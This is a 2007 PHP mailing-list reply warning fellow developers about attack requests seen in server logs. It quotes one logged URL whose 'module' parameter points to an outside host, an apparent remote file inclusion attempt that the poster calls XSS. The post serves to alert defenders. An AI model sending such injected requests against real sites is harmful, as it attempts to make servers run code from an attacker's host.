Re: evil script in server logs (Heads Up)
| From: | Paul Scott | Date: | Fri, 05 Oct 2007 15:44:46 +0000 |
| Subject: | Re: evil script in server logs (Heads Up) | ||
| References: | 1 2 3 4 5 6 | Groups: | php.general |
| Request: | Send a blank email to php-general+get-262819@lists.php.net to get a copy of this message | ||
On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
> Yeah, honestly I wasn't sure if it was an injection attack or if
> those URLs were referrers in the logs.
OK sorry if I wasn't 100% clear here, but the logs showed up something
like:
http://fsiu.uwc.ac.za/index.php?module=http://www.goodasgold.com/nav
So basically it was an XSS attempt, but because our MVC security is
decent, it is just more of an annoyance than anything else (it screws up
my stats man!)
What I was trying to say is that *if* you didn't know about this one
before, now you do. They are hitting all of our sites at a rate of
knots, so are probably doing the same elsewhere.
--Paul